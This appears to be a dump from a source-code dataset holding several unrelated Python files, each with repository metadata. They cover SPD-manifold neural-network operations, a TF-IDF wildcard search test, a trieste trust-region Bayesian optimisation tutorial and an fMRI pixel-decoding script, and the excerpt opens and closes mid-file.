torch.svd(inp_svd.cpu())[0][:, :no]\n W.data[i, j] = vv.cuda()\n\n\ndef add_id_matrix(P, alpha):\n '''\n Input P of shape (batch_size,1,n,n)\n Add Id\n '''\n P = P + alpha * P.trace() * torch.eye(\n P.shape[-1], dtype=P.dtype, device=P.device)\n return P\n\n\ndef bimap(X, W):\n '''\n Bilinear mapping function\n :param X: Input matrix of shape (batch_size,n_in,n_in)\n :param W: Stiefel parameter of shape (n_in,n_out)\n :return: Bilinearly mapped matrix of shape (batch_size,n_out,n_out)\n '''\n # print(W.dtype)\n # print(X.dtype)\n # print(X.shape)\n # print(W.shape)\n return W.t().float().matmul(X.float()).matmul(W.float())\n\n\ndef bimap_channels(X, W):\n '''\n Bilinear mapping function over multiple input and output channels\n :param X: Input matrix of shape (batch_size,channels_in,n_in,n_in)\n :param W: Stiefel parameter of shape (channels_out,channels_in,n_in,n_out)\n :return: Bilinearly mapped matrix of shape (batch_size,channels_out,n_out,n_out)\n '''\n # Pi=th.zeros(X.shape[0],1,W.shape[-1],W.shape[-1],dtype=X.dtype,device=X.device)\n # for j in range(X.shape[1]):\n # Pi=Pi+bimap(X,W[j])\n batch_size, channels_in, n_in, _ = X.shape\n channels_out, _, _, n_out = W.shape\n P = torch.zeros(batch_size,\n channels_out,\n n_out,\n n_out,\n dtype=X.dtype,\n device=X.device)\n for co in range(channels_out):\n P[:, co, :, :] = sum([\n bimap(X[:, ci, :, :], W[co, ci, :, :]) for ci in range(channels_in)\n ])\n return P\n\n\nclass Re_op():\n \"\"\" Relu function and its derivative \"\"\"\n _threshold = 1e-4\n\n @classmethod\n def fn(cls, S, param=None):\n return nn.Threshold(cls._threshold, cls._threshold)(S)\n\n @classmethod\n def fn_deriv(cls, S, param=None):\n return (S > cls._threshold).double()\n\n\nclass ReEig(F):\n \"\"\"\n Input P: (batch_size,h) SPD matrices of size (n,n)\n Output X: (batch_size,h) of rectified eigenvalues matrices of size (n,n)\n \"\"\"\n\n @staticmethod\n def forward(ctx, P):\n X, U, S, S_fn = modeig_forward_re(P, Re_op)\n ctx.save_for_backward(U, S, S_fn)\n return X\n\n @staticmethod\n def backward(ctx, dx):\n # if __debug__:\n # import pydevd\n # pydevd.settrace(suspend=False, trace_only_current_thread=True)\n U, S, S_fn = ctx.saved_variables\n return modeig_backward(dx, U, S, S_fn, Re_op)\n\n\ndef BatchDiag(P):\n \"\"\"\n Input P: (batch_size,channels) vectors of size (n)\n Output Q: (batch_size,channels) diagonal matrices of size (n,n)\n \"\"\"\n batch_size, channels, n = P.shape # batch size,channel depth,dimension\n Q = torch.zeros(batch_size, channels, n, n, dtype=P.dtype, device=P.device)\n for i in range(batch_size): # can vectorize\n for j in range(channels): # can vectorize\n Q[i, j] = P[i, j].diag()\n return Q\n\n\ndef modeig_forward_re(P, op, eig_mode='svd', param=None):\n '''\n Generic forward function of non-linear eigenvalue modification\n LogEig, ReEig, etc inherit from this class\n Input P: (batch_size,channels) SPD matrices of size (n,n)\n Output X: (batch_size,channels) modified symmetric matrices of size (n,n)\n '''\n batch_size, channels, n, n = P.shape\n U, S = torch.zeros_like(P, device=P.device), torch.zeros(batch_size,\n channels,\n n,\n dtype=P.dtype,\n device=P.device)\n for i in range(batch_size):\n for j in range(channels):\n if (eig_mode == 'eig'):\n s, U[i, j] = torch.linalg.eig(P[i, j], True)\n S[i, j] = s[:, 0]\n elif (eig_mode == 'svd'):\n U[i, j], S[i, j], _ = torch.svd(add_id_matrix(P[i, j], 1e-5))\n # U[i, j], S[i, j], _ = torch.svd(add_id_matrix(P[i, j].cpu(), 1e-5))\n # U, S = U.cuda(), S.cuda()\n S_fn = op.fn(S, param)\n X = U.matmul(BatchDiag(S_fn)).matmul(U.transpose(2, 3))\n return X, U, S, S_fn\n\n\ndef modeig_forward_etc(P, op, eig_mode='svd', param=None):\n '''\n Generic forward function of non-linear eigenvalue modification\n LogEig, ReEig, etc inherit from this class\n Input P: (batch_size,channels) SPD matrices of size (n,n)\n Output X: (batch_size,channels) modified symmetric matrices of size (n,n)\n '''\n batch_size, channels, n, n = P.shape\n U, S = torch.zeros_like(P, device=P.device), torch.zeros(batch_size,\n channels,\n n,\n dtype=P.dtype,\n device=P.device)\n for i in range(batch_size):\n for j in range(channels):\n if (eig_mode == 'eig'):\n # s, U[i, j] = torch.linalg.eig(P[i, j])\n s, U[i, j] = torch.eig(P[i, j].cpu(), True)\n S[i, j] = s[:, 0]\n elif (eig_mode == 'svd'):\n # U[i, j], S[i, j], _ = torch.svd(add_id_matrix(P[i, j], 1e-5))\n U[i, j], S[i, j], _ = torch.svd(add_id_matrix(P[i, j].cpu(), 1e-5))\n U, S = U.cuda(), S.cuda()\n S_fn = op.fn(S, param)\n X = U.matmul(BatchDiag(S_fn)).matmul(U.transpose(2, 3))\n return X, U, S, S_fn\n\n\ndef modeig_backward(dx, U, S, S_fn, op, param=None):\n '''\n Generic backward function of non-linear eigenvalue modification\n LogEig, ReEig, etc inherit from this class\n Input P: (batch_size,channels) SPD matrices of size (n,n)\n Output X: (batch_size,channels) modified symmetric matrices of size (n,n)\n '''\n # if __debug__:\n # import pydevd\n # pydevd.settrace(suspend=False, trace_only_current_thread=True)\n # print(\"Correct back prop\")\n\n S_fn_deriv = BatchDiag(op.fn_deriv(S, param)).float()\n SS = S[..., None].repeat(1, 1, 1, S.shape[-1])\n SS_fn = S_fn[..., None].repeat(1, 1, 1, S_fn.shape[-1])\n L = (SS_fn - SS_fn.transpose(2, 3)) / (SS - SS.transpose(2, 3))\n L[L == -np.inf] = 0\n L[L == np.inf] = 0\n L[torch.isnan(L)] = 0\n L = L + S_fn_deriv\n dp = L * (U.transpose(2, 3).matmul(dx).matmul(U))\n dp = U.matmul(dp).matmul(U.transpose(2, 3))\n return dp\n\n\nclass Sqm_op():\n \"\"\" sqrt function and its derivative \"\"\"\n\n @staticmethod\n def fn(S, param=None):\n return torch.sqrt(S)\n\n @staticmethod\n def fn_deriv(S, param=None):\n return 0.5 / torch.sqrt(S)\n\n\nclass Sqminv_op():\n \"\"\" Inverse sqrt function and its derivative \"\"\"\n\n @staticmethod\n def fn(S, param=None):\n return 1 / torch.sqrt(S)\n\n @staticmethod\n def fn_deriv(S, param=None):\n return -0.5 / torch.sqrt(S) ** 3\n\n\nclass SqmEig(F):\n \"\"\"\n Input P: (batch_size,h) SPD matrices of size (n,n)\n Output X: (batch_size,h) of square root eigenvalues matrices of size (n,n)\n \"\"\"\n\n @staticmethod\n def forward(ctx, P):\n # X, U, S, S_fn = modeig_forward_re(P, Sqm_op)\n X, U, S, S_fn = modeig_forward_etc(P, Sqm_op)\n ctx.save_for_backward(U, S, S_fn)\n return X\n\n @staticmethod\n def backward(ctx, dx):\n # if __debug__:\n # import pydevd\n # pydevd.settrace(suspend=False, trace_only_current_thread=True)\n U, S, S_fn = ctx.saved_variables\n return modeig_backward(dx, U, S, S_fn, Sqm_op)\n\n\nclass SqminvEig(F):\n \"\"\"\n Input P: (batch_size,h) SPD matrices of size (n,n)\n Output X: (batch_size,h) of inverse square root eigenvalues matrices of size (n,n)\n \"\"\"\n\n @staticmethod\n def forward(ctx, P):\n X, U, S, S_fn = modeig_forward_etc(P, Sqminv_op)\n ctx.save_for_backward(U, S, S_fn)\n return X\n\n @staticmethod\n def backward(ctx, dx):\n # if __debug__:\n # import pydevd\n # pydevd.settrace(suspend=False, trace_only_current_thread=True)\n U, S, S_fn = ctx.saved_variables\n return modeig_backward(dx, U, S, S_fn, Sqminv_op)\n\n\ndef CongrG(P, G, mode):\n \"\"\"\n Input P: (batch_size,channels) SPD matrices of size (n,n) or single matrix (n,n)\n Input G: matrix (n,n) to do the congruence by\n Output PP: (batch_size,channels) of congruence by sqm(G) or sqminv(G) or single matrix (n,n)\n \"\"\"\n P, G = P.float(), G.float()\n if (mode == 'pos'):\n GG = SqmEig.apply(G[None, None, :, :])\n elif (mode == 'neg'):\n GG = SqminvEig.apply(G[None, None, :, :])\n PP = GG.matmul(P.float()).matmul(GG.float())\n return PP\n\n\nclass Log_op():\n \"\"\" Log function and its derivative \"\"\"\n\n @staticmethod\n def fn(S, param=None):\n return torch.log(S)\n\n @staticmethod\n def fn_deriv(S, param=None):\n return 1 / S\n\n\nclass Re_op():\n \"\"\" Relu function and its derivative \"\"\"\n _threshold = 1e-4\n\n @classmethod\n def fn(cls, S, param=None):\n return nn.Threshold(cls._threshold, cls._threshold)(S)\n\n @classmethod\n def fn_deriv(cls, S, param=None):\n return (S > cls._threshold).double()\n\n\nclass LogEig(F):\n \"\"\"\n Input P: (batch_size,h) SPD matrices of size (n,n)\n Output X: (batch_size,h) of log eigenvalues matrices of size (n,n)\n \"\"\"\n\n @staticmethod\n def forward(ctx, P):\n # X, U, S, S_fn = modeig_forward_re(P, Sqm_op)\n X, U, S, S_fn = modeig_forward_etc(P, Log_op)\n ctx.save_for_backward(U, S, S_fn)\n return X\n\n @staticmethod\n def backward(ctx, dx):\n # if __debug__:\n # import pydevd\n # pydevd.settrace(suspend=False, trace_only_current_thread=True)\n U, S, S_fn = ctx.saved_variables\n return modeig_backward(dx, U, S, S_fn, Log_op)\n\n\ndef LogG(x, X):\n \"\"\" Logarithmc mapping of x on the SPD manifold at X \"\"\"\n return CongrG(LogEig.apply(CongrG(x, X, 'neg')), X, 'pos')\n\n\nclass Exp_op():\n \"\"\" Log function and its derivative \"\"\"\n\n @staticmethod\n def fn(S, param=None):\n return torch.exp(S)\n\n @staticmethod\n def fn_deriv(S, param=None):\n return torch.exp(S)\n\n\nclass ExpEig(F):\n \"\"\"\n Input P: (batch_size,h) symmetric matrices of size (n,n)\n Output X: (batch_size,h) of exponential eigenvalues matrices of size (n,n)\n \"\"\"\n\n @staticmethod\n def forward(ctx, P):\n X, U, S, S_fn = modeig_forward_etc(P, Exp_op, eig_mode='eig')\n ctx.save_for_backward(U, S, S_fn)\n return X\n\n @staticmethod\n def backward(ctx, dx):\n # if __debug__:\n # import pydevd\n # pydevd.settrace(suspend=False, trace_only_current_thread=True)\n U, S, S_fn = ctx.saved_variables\n return modeig_backward(dx, U, S, S_fn, Exp_op)\n\n\nclass Power_op():\n \"\"\" Power function and its derivative \"\"\"\n _power = 1\n\n @classmethod\n def fn(cls, S, param=None):\n return S ** cls._power\n\n @classmethod\n def fn_deriv(cls, S, param=None):\n return (cls._power) * S ** (cls._power - 1)\n\n\nclass PowerEig(F):\n \"\"\"\n Input P: (batch_size,h) SPD matrices of size (n,n)\n Output X: (batch_size,h) of power eigenvalues matrices of size (n,n)\n \"\"\"\n\n @staticmethod\n def forward(ctx, P, power):\n Power_op._power = power\n X, U, S, S_fn = modeig_forward_etc(P, Power_op)\n ctx.save_for_backward(U, S, S_fn)\n return X\n\n @staticmethod\n def backward(ctx, dx):\n # if __debug__:\n # import pydevd\n # pydevd.settrace(suspend=False, trace_only_current_thread=True)\n U, S, S_fn = ctx.saved_variables\n return modeig_backward(dx, U, S, S_fn, Power_op), None\n\n\ndef geodesic(A, B, t):\n '''\n Geodesic from A to B at step t\n :param A: SPD matrix (n,n) to start from\n :param B: SPD matrix (n,n) to end at\n :param t: scalar parameter of the geodesic (not constrained to [0,1])\n :return: SPD matrix (n,n) along the geodesic\n '''\n M = CongrG(PowerEig.apply(CongrG(B.float(), A.float(), 'neg'), t), A, 'pos')[0, 0]\n return M\n\n\ndef ExpG(x, X):\n \"\"\" Exponential mapping of x on the SPD manifold at X \"\"\"\n return CongrG(ExpEig.apply(CongrG(x, X, 'neg')), X, 'pos')\n\n\ndef karcher_step(x, G, alpha):\n '''\n One step in the Karcher flow\n '''\n x_log = LogG(x, G)\n G_tan = x_log.mean(dim=0)[None, ...]\n G = ExpG(alpha * G_tan, G)[0, 0]\n return G\n\n\ndef BaryGeom(x, by_channel=False):\n '''\n Function which computes the Riemannian barycenter for a batch of data using the Karcher flow\n Input x is a batch of SPD matrices (batch_size,1,n,n) to average\n Output is (n,n) Riemannian mean\n '''\n k = 1\n alpha = 1\n batch_size = x.shape[0]\n channels = x.shape[1]\n n = x.shape[2]\n G = []\n if by_channel == True:\n for i in range(batch_size):\n inp = x[i, :, :, :]\n inp = inp.view(channels, 1, x.shape[2], x.shape[3])\n G_sample = torch.mean(inp, dim=0)[0, :, :]\n for _ in range(k):\n G_sample = karcher_step(inp, G_sample, alpha)\n G_sample.view(1, G_sample.shape[0], G_sample.shape[1])\n G.append(G_sample)\n G = torch.cat(G, dim=0)\n G = G.view(batch_size, 1, n, n)\n else:\n # with th.no_grad():\n G = torch.mean(x, dim=0)[0, :, :]\n for _ in range(k):\n G = karcher_step(x, G, alpha)\n return G\n","repo_name":"Candy-CY/Hyperspectral-Image-Classification-Models","sub_path":"AMS-M2ESL/model/module/manifold_learning_fun.py","file_name":"manifold_learning_fun.py","file_ext":"py","file_size_in_byte":14799,"program_lang":"python","lang":"en","doc_type":"code","stars":237,"dataset":"github-code","pt":"3"} +{"seq_id":"34201494543","text":"#from flask import Flask, render_template, request\nimport re, fileinput, mmap, nltk\nfrom tqdm import tqdm\nfrom termcolor import colored\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport numpy as np\nfrom nltk.stem.snowball import SnowballStemmer\n\n#splits the articles\ndef relevance(documents_in):\n \n documents_pre = documents_in.split(\"</article>\") #splits the file into a list at </article>\n for i in documents_pre:\n i = re.sub(\"<article name=\", \"\", i)\n i = re.sub(\">\", \"\", i)\n documents.append(i)\n\n return documents\n\ndef test_wcquery(query):\n matches = []\n tfv = TfidfVectorizer(lowercase=True, sublinear_tf=True, use_idf=True, norm=\"l2\", token_pattern=r\"\\b\\w\\w+\\-*\\'*\\w*\\b\")\n global tf_matrix, terms, t2i\n tf_matrix = tfv.fit_transform(documents).T.todense()\n terms = tfv.get_feature_names()\n wc_query = query+\".+\"\n #print(\"wildcard query: \", wc_query)\n\n wc_words = [w for w in terms if re.fullmatch(wc_query, w)]\n #print(\"wc_words: \", wc_words)\n \n if wc_words:\n new_query_string = \" \".join(wc_words)\n #print(\"new_query_string: \", new_query_string)\n query_vec = tfv.transform([new_query_string]).todense()\n #print(\"query_vec: \", query_vec)\n scores = np.dot(query_vec, tf_matrix) \n ranked_scores_and_doc_ids = \\\n sorted([ (score, i) for i, score in enumerate(np.array(scores)[0]) if score > 0], reverse=True)\n #print(\"There are \", len(ranked_scores_and_doc_ids), \" documents matching your query.\")\n\n for score, i in ranked_scores_and_doc_ids:\n score = \"{:.4f}\".format(score)\n snippet_index = documents[i].lower().find(query) #Finds an index for a snippet for printing results.\n header = documents[i].split('\"')[1] #Finds the header of an article for printing results.\n header = str(header)\n snippet = \"...\"+documents[i][snippet_index:snippet_index+100]+\"...\"\n snippet = str(snippet)\n line = \"The score of \" + query + \" is \"+ score + \" in the document named: \" + header + \"\\n\" + \"Here is a snippet: \" + snippet\n #print(\"Line: \", type(line))\n matches.append(line)\n \n else:\n line = \"No matches for wildcard search \" + query\n matches.append(line)\n print()\n \n \n #print(\"query: \" + query + \"\\n document: \" + header + \"\\n snippet: \" + snippet + \"\\n ***\")\n#print(\"The score of \" + query + \" is {:.4f} in the document named: {:s}. Here is a snippet: ...{:s}...\\n***\".format(score, header, documents[i][snippet_index:snippet_index+100]))\n #print(matches)\n print(matches)\n return matches\n\n#searches for query \ndef test_query(query):\n matches = []\n \n \"\"\"Ceates a matric and term-dictionary index\"\"\"\n \n tfv = TfidfVectorizer(lowercase=True, sublinear_tf=True, use_idf=True, norm=\"l2\", token_pattern=r\"\\b\\w\\w+\\-*\\'*\\w*\\b\")\n global tf_matrix, terms, t2i\n tf_matrix = tfv.fit_transform(documents).T.todense()\n terms = tfv.get_feature_names()\n\n if query in terms:\n t2i = tfv.vocabulary_ # shorter notation: t2i = term-to-index\n hits_list = np.array(tf_matrix[t2i[query]])[0]\n hits_and_doc_ids = [ (hits, i) for i, hits in enumerate(hits_list) if hits > 0 ]\n\n ranked_hits_and_doc_ids = sorted(hits_and_doc_ids, reverse=True)\n\n #cosine similarity:\n query_vec = tfv.transform([query]).todense()\n scores = np.dot(query_vec, tf_matrix) \n ranked_scores_and_doc_ids = \\\n sorted([ (score, i) for i, score in enumerate(np.array(scores)[0]) if score > 0], reverse=True)\n #print(\"There are \", len(ranked_scores_and_doc_ids), \" documents matching your query:\")\n \n for score, i in ranked_scores_and_doc_ids:\n score = \"{:.4f}\".format(score)\n snippet_index = documents[i].lower().find(query) #Finds an index for a snippet for printing results.\n header = documents[i].split('\"')[1] #Finds the header of an article for printing results.\n header = str(header)\n snippet = \"...\"+documents[i][snippet_index:snippet_index+100]+\"...\"\n snippet = str(snippet)\n line = \"The score of \" + query + \" is \"+ score + \" in the document named: \" + header + \"\\n\" + \"Here is a snippet: \" + snippet\n matches.append(line)\n\n else:\n line = \"No matches for wildcard search \" + query\n matches.append(line)\n #print(\"query: \" + query + \"\\n document: \" + header + \"\\n snippet: \" + snippet + \"\\n ***\")\n #print(\"The score of \" + query + \" is {:.4f} in the document named: {:s}. Here is a snippet: ...{:s}...\\n***\".format(score, header, documents[i][snippet_index:snippet_index+100]))\n print(matches)\n return matches\n\n\n#running the program\ndocuments = []\nfile_variable = open(\"enwiki-20181001-corpus.100-articles.txt\", encoding=\"utf8\")\ntext_string = file_variable.read()\nprint(\"This is a test seach engine for wildcards\")\nquery = input(\"input query:\")\n\nquery = query.lower()\ndocuments = relevance(text_string)\n#documents = modify_wildcards_in_doc(query, documents)\n\nmatches = test_query(query) \n\n","repo_name":"kanerv/TuukkaSaanaKanerva","sub_path":"Test_files/wildcard_search_test.py","file_name":"wildcard_search_test.py","file_ext":"py","file_size_in_byte":5272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"523966914","text":"# ---\n# jupyter:\n# jupytext:\n# cell_metadata_filter: -all\n# custom_cell_magics: kql\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.3'\n# jupytext_version: 1.11.2\n# kernelspec:\n# display_name: .venv_310\n# language: python\n# name: python3\n# ---\n\n# %% [markdown]\n# # Trust region Bayesian optimization\n#\n# We will demonstrate three trust region Bayesian optimization algorithms in this tutorial.\n\n# %%\nimport numpy as np\nimport tensorflow as tf\n\nnp.random.seed(1793)\ntf.random.set_seed(1793)\n\n# %% [markdown]\n# ## Define the problem and model\n#\n# We can use trust regions for Bayesian optimization in much the same way as we used EGO and EI in\n# the [introduction notebook](expected_improvement.ipynb). Since the setup is very similar to\n# that tutorial, we'll skip over most of the detail.\n\n# %%\nimport trieste\nfrom trieste.objectives import Branin\n\nbranin = Branin.objective\nsearch_space = Branin.search_space\n\nnum_initial_data_points = 10\ninitial_query_points = search_space.sample(num_initial_data_points)\nobserver = trieste.objectives.utils.mk_observer(branin)\ninitial_data = observer(initial_query_points)\n\n# %% [markdown]\n# As usual, we'll use Gaussian process regression to model the function. Note that we set the\n# likelihood variance to a small number because we are dealing with a noise-free problem.\n\n# %%\nfrom trieste.models.gpflow import GaussianProcessRegression, build_gpr\n\n\ndef build_model():\n gpflow_model = build_gpr(\n initial_data, search_space, likelihood_variance=1e-7\n )\n return GaussianProcessRegression(gpflow_model)\n\n\n# %% [markdown]\n# ## Trust region `TREGO` acquisition rule\n#\n# First we show how to run Bayesian optimization with the `TREGO` algorithm. This is a trust region\n# algorithm that alternates between regular EGO steps and local steps within one trust region\n# (see <cite data-cite=\"diouane2022trego\"/>).\n#\n# ### Create `TREGO` rule and run optimization loop\n#\n# We can run the Bayesian optimization loop by defining a `BayesianOptimizer` and calling its\n# `optimize` method with the trust region rule. Once the optimization loop is complete, the\n# optimizer will return one new query point for every step in the loop; that's 5 points in total.\n#\n# In order to create the `TREGO` rule, we use the `BatchTrustRegionBox` class. This class supports\n# multiple trust regions, but here we only need one region of type `TREGOBox`. The `TREGOBox` class\n# implements the `TREGO` algorithm inside a single trust region. Note: we cover batch trust regions in\n# more detail in the next section.\n#\n# `TREGO` is a \"meta\" rule that applies a base-rule, either inside a trust region or the whole\n# space. The default base-rule is `EfficientGlobalOptimization`, but a different base-rule can be\n# provided as an argument to `TREGO`. Here we explicitly set it to make usage clear.\n\n# %%\ntrego_acq_rule = trieste.acquisition.rule.BatchTrustRegionBox(\n trieste.acquisition.rule.TREGOBox(search_space),\n rule=trieste.acquisition.rule.EfficientGlobalOptimization(),\n)\nbo = trieste.bayesian_optimizer.BayesianOptimizer(observer, search_space)\n\nnum_steps = 5\nresult = bo.optimize(\n num_steps, initial_data, build_model(), trego_acq_rule, track_state=True\n)\ndataset = result.try_get_final_dataset()\n\n# %% [markdown]\n# ### Visualizing `TREGO` results\n#\n# Let's take a look at where we queried the observer, the original query points (crosses), new\n# query points (dots) and the optimum point found (purple dot), and where they lie with respect to\n# the contours of the Branin.\n\n# %%\nfrom trieste.experimental.plotting import plot_bo_points, plot_function_2d\n\n\ndef plot_final_result(_dataset: trieste.data.Dataset) -> None:\n arg_min_idx = tf.squeeze(tf.argmin(_dataset.observations, axis=0))\n query_points = _dataset.query_points.numpy()\n _, ax = plot_function_2d(\n branin,\n search_space.lower,\n search_space.upper,\n grid_density=40,\n contour=True,\n )\n\n plot_bo_points(query_points, ax[0, 0], num_initial_data_points, arg_min_idx)\n\n\nplot_final_result(dataset)\n\n# %% [markdown]\n# We can also visualize the progress of the optimization by plotting the acquisition space at each\n# step. This space is either the full search space or the trust region, depending on the step, and\n# is shown as a translucent box; with the current optimum point in a region shown in matching\n# color.\n#\n# Note there is only one trust region in this plot, however the rule in the next section will show\n# multiple trust regions.\n\n# %%\nimport base64\n\nimport IPython\nimport matplotlib.pyplot as plt\n\nfrom trieste.experimental.plotting import (\n convert_figure_to_frame,\n convert_frames_to_gif,\n plot_trust_region_history_2d,\n)\n\n\ndef plot_history(result: trieste.bayesian_optimizer.OptimizationResult) -> None:\n frames = []\n for step, hist in enumerate(\n result.history + [result.final_result.unwrap()]\n ):\n fig, _ = plot_trust_region_history_2d(\n branin,\n search_space.lower,\n search_space.upper,\n hist,\n num_init=num_initial_data_points,\n )\n\n if fig is not None:\n fig.suptitle(f\"step number {step}\")\n frames.append(convert_figure_to_frame(fig))\n plt.close(fig)\n\n gif_file = convert_frames_to_gif(frames)\n gif = IPython.display.HTML(\n '<img src=\"data:image/gif;base64,{0}\"/>'.format(\n base64.b64encode(gif_file.getvalue()).decode()\n )\n )\n IPython.display.display(gif)\n\n\nplot_history(result)\n\n# %% [markdown]\n# ## Batch trust region rule\n#\n# Next we demonstrate how to run Bayesian optimization with the batch trust region rule.\n#\n# ### Create the batch trust region acquisition rule\n#\n# We achieve Bayesian optimization with trust regions by specifying `BatchTrustRegionBox` as the\n# acquisition rule.\n#\n# This rule needs an initial number `num_query_points` of sub-spaces (or trust regions) to be\n# provided and performs optimization in parallel across all these sub-spaces. Each region\n# contributes one query point, resulting in each acquisition step collecting `num_query_points`\n# points overall. As the optimization process continues, the bounds of these sub-spaces are\n# dynamically updated. In this example, we create 5 `SingleObjectiveTrustRegionBox` regions. This\n# class encapsulates the behavior of a trust region in a single sub-space; being responsible for\n# maintaining its own state, initializing it, and updating it after each step.\n#\n# In addition, `BatchTrustRegionBox` is a \"meta\" rule that requires the specification of a\n# batch aquisition base-rule for performing optimization; for our example we use\n# `EfficientGlobalOptimization` coupled with the `ParallelContinuousThompsonSampling` acquisition\n# function.\n#\n# Note: in this example the number of sub-spaces/regions is equal to the number of batch query\n# points in the base-rule. This results in each region contributing one query point to the overall\n# batch. However, it is possible to generate multiple query points from each region by setting\n# `num_query_points` to be a multiple `Q` of the number of regions. In this case, each region will\n# contribute `Q` query points to the overall batch.\n\n# %%\nnum_query_points = 5\n\ninit_subspaces = [\n trieste.acquisition.rule.SingleObjectiveTrustRegionBox(search_space)\n for _ in range(num_query_points)\n]\nbase_rule = trieste.acquisition.rule.EfficientGlobalOptimization( # type: ignore[var-annotated]\n builder=trieste.acquisition.ParallelContinuousThompsonSampling(),\n num_query_points=num_query_points,\n)\nbatch_acq_rule = trieste.acquisition.rule.BatchTrustRegionBox(\n init_subspaces, base_rule\n)\n\n# %% [markdown]\n# ### Run the optimization loop\n#\n# We run the Bayesian optimization loop as before by defining a `BayesianOptimizer` and calling its\n# `optimize` method with the trust region rule. Once the optimization loop is complete, the\n# optimizer will return `num_query_points` new query points for every step in the loop. With\n# 5 steps, that's 25 points in total.\n\n# %%\nbo = trieste.bayesian_optimizer.BayesianOptimizer(observer, search_space)\n\nnum_steps = 5\nresult = bo.optimize(\n num_steps, initial_data, build_model(), batch_acq_rule, track_state=True\n)\ndataset = result.try_get_final_dataset()\n\n# %% [markdown]\n# ### Visualizing batch trust region results\n#\n# We visualize the results as before.\n\n# %%\nplot_final_result(dataset)\n\n# %%\nplot_history(result)\n\n# %% [markdown]\n# ## Trust region `TurBO` acquisition rule\n#\n# Finally, we show how to run Bayesian optimization with the `TurBO` algorithm. This is a\n# trust region algorithm that uses local models and datasets to approximate the objective function\n# within one trust region.\n#\n# ### Create `TurBO` rule and run optimization loop\n#\n# As before, this meta-rule requires the specification of an aquisition base-rule for performing\n# optimization within the trust region; for our example we use the `DiscreteThompsonSampling` rule.\n#\n# Note that trieste maintains a global model that is, by default, automatically trained on each\n# iteration. However, this global model is unused for `TurBO`; which uses a local model instead.\n# As fitting the global model would be redundant and wasteful, we switch its training off by\n# setting `fit_model=False` in the `optimize` method.\n\n# %%\nturbo_acq_rule = trieste.acquisition.rule.TURBO(\n search_space, rule=trieste.acquisition.rule.DiscreteThompsonSampling(500, 3)\n)\nbo = trieste.bayesian_optimizer.BayesianOptimizer(observer, search_space)\n\nnum_steps = 5\nresult = bo.optimize(\n num_steps,\n initial_data,\n build_model(),\n turbo_acq_rule,\n track_state=True,\n fit_model=False,\n)\ndataset = result.try_get_final_dataset()\n\n# %% [markdown]\n# ### Visualizing `TurBO` results\n#\n# We display the results as earlier.\n\n# %%\nplot_final_result(dataset)\n\n# %%\nplot_history(result)\n\n# %% [markdown]\n# ## LICENSE\n#\n# [Apache License 2.0](https://github.com/secondmind-labs/trieste/blob/develop/LICENSE)\n","repo_name":"secondmind-labs/trieste","sub_path":"docs/notebooks/trust_region.pct.py","file_name":"trust_region.pct.py","file_ext":"py","file_size_in_byte":10081,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"3"} +{"seq_id":"29083618828","text":"from matplotlib.colors import LinearSegmentedColormap\nimport numpy as np\nimport sys\nimport time\n\n\n### Load the dataset from Miyawaki #####################################################\nfrom utils import datasets\ndataset = datasets.fetch_miyawaki2008()\n\n# Keep only random runs\nX_random = dataset.func[12:]\ny_random = dataset.label[12:]\ny_shape = (10, 10)\n\n### Preprocess data ###########################################################\nfrom utils import masking, signal\nimport nibabel\n\nsys.stderr.write(\"Preprocessing data...\")\nt0 = time.time()\n\nbluegreen = LinearSegmentedColormap('bluegreen', {\n 'red': ((0., 0., 0.),\n (1., 0., 0.)),\n 'green': ((0., 0., 0.),\n (1., 1., 1.)),\n 'blue': ((0., 0.2, 0.2),\n (0.5, 0.5, 0.5),\n (1., 0., 0.))\n })\n\n\n# Load and mask fMRI data\n\nX_train = []\nfor x_random in X_random:\n # Mask data\n x_img = nibabel.load(x_random)\n x = masking.apply_mask(x_img, dataset.mask)\n x = signal.clean(x, standardize=True, detrend=True)\n X_train.append(x)\n\n# Load target data\ny_train = []\nfor y in y_random:\n y_train.append(np.reshape(np.loadtxt(y, dtype=np.int, delimiter=','),\n (-1,) + y_shape, order='F'))\n\nX_train = [x[2:] for x in X_train]\ny_train = [y[:-2] for y in y_train]\n\nX_train = np.vstack(X_train)\ny_train = np.vstack(y_train).astype(np.float)\n\n# Remove rest period\nX_train = X_train[y_train[:, 0, 0] != -1]\ny_train = y_train[y_train[:, 0, 0] != -1]\n\ny_train = np.reshape(y_train, (-1, y_shape[0] * y_shape[1]))\n\nsys.stderr.write(\" Done (%.2fs)\\n\" % (time.time() - t0))\n\n### Prediction function #######################################################\nimport pylab as pl\nimport os\n\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import LogisticRegression as LR\nfrom sklearn.feature_selection import f_classif, SelectKBest\n\nsys.stderr.write(\"Single pixel prediction\\n\")\n\n# Pixel chose for the study\np = (4, 2)\n\n# Get index of the chosen pixel in flattened array\ni_p = 42\n\n# Logistic Regression\nsys.stderr.write(\"\\tLogistic regression...\")\nt0 = time.time()\ncache_path = os.path.join('miyawaki', 'lr_coef.npy')\nif not os.path.exists(cache_path):\n lr = LR(penalty='l1', C=0.05)\n lr.fit(X_train, y_train[:, i_p])\n np.save(cache_path, lr.coef_)\nlr_coef = np.load(cache_path)\nsys.stderr.write(\" Done (%.2fs)\\n\" % (time.time() - t0))\n\n# Support Vector Classifier\nsys.stderr.write(\"\\tSupport vector classifier...\")\nt0 = time.time()\ncache_path = os.path.join('miyawaki', 'svc_coef.npy')\nif not os.path.exists(cache_path):\n svc = LinearSVC(penalty='l1', dual=False, C=0.01)\n svc.fit(X_train, y_train[:, i_p])\n np.save(cache_path, svc.coef_)\nsvc_coef = np.load(cache_path)\nsys.stderr.write(\" Done (%.2fs)\\n\" % (time.time() - t0))\n\n### Output ###################################################################\nfrom matplotlib.lines import Line2D\n\n# Create masks for contour\n### Mask of chosen voxels\ncontour = np.zeros(nibabel.load(dataset.mask).shape, dtype=bool)\nfor x, y in [(31, 9), (31, 10), (30, 10), (32, 10)]:\n contour[x, y, 10] = 1\n### Mask of chosen pixel\npixmask = np.zeros((10, 10), dtype=bool)\npixmask[p] = 1\n\n\ndef plot_lines(mask, linewidth=3, color='b'):\n for i, j in np.ndindex(mask.shape):\n if i + 1 < mask.shape[0] and mask[i, j] != mask[i + 1, j]:\n pl.gca().add_line(Line2D([j - .5, j + .5], [i + .5, i + 